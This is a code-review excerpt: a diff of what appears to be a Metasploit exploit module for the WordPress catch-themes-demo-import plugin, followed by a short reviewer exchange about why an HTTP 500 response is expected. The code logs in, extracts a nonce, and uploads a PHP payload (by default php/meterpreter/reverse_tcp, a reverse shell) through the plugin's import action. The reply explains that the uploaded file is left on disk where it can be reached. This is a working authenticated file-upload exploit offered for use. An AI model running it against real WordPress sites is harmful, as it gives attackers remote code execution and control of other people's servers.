modules/exploits/multi/http/wp_catch_themes_demo_import.rb

```diff
@@ -0,0 +1,129 @@
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
+    ]
+  end
+
+  def check
+    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?
+
+    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
+    if checkcode == CheckCode::Safe
+      print_error('catch-themes-demo-import not a vulnerable version')
+    end
+    return checkcode
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie.nil?
+      vprint_error('Invalid login, check credentials')
+      return
+    end
+
+    # grab the ajax_nonce
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),
+      'method' => 'GET',
+      'cookie' => cookie,
+      'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.
+      'vars_get' => {
+        'page' => 'catch-themes-demo-import'
+      }
+    })
+    fail_with(Failure::Unreachable, 'Site not responding') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
+    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
+    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
+    vprint_status("Ajax Nonce: #{ajax_nonce}")
+
+    random_filename = "#{rand_text_alphanumeric(6..12)}.php"
+    vprint_status("Uploading payload filename: #{random_filename}")
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')
+    multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')
+    multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')
+    multipart_form.add_part(
+      payload.encoded,
+      'application/x-php',
+      nil,
+      "form-data; name=\"content_file\"; filename=\"#{random_filename}\""
+    )
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'keep_cookies' => 'true',
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+    fail_with(Failure::Unreachable, 'Site not responding') unless res
+    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
```

Comment:
This seems like an odd response to expect `500`?  Might be worth a code comment that explains something about why an error result is expected as the CVE advisory does not help with understanding that detail.

Reply:
agreed, took me a few min to debug when writing. basically it wants xml, we gave it php, it doesn't clean up bad input just leaves it on disk where we can access it.  wrote in a comment plus the apache log for thoroughness.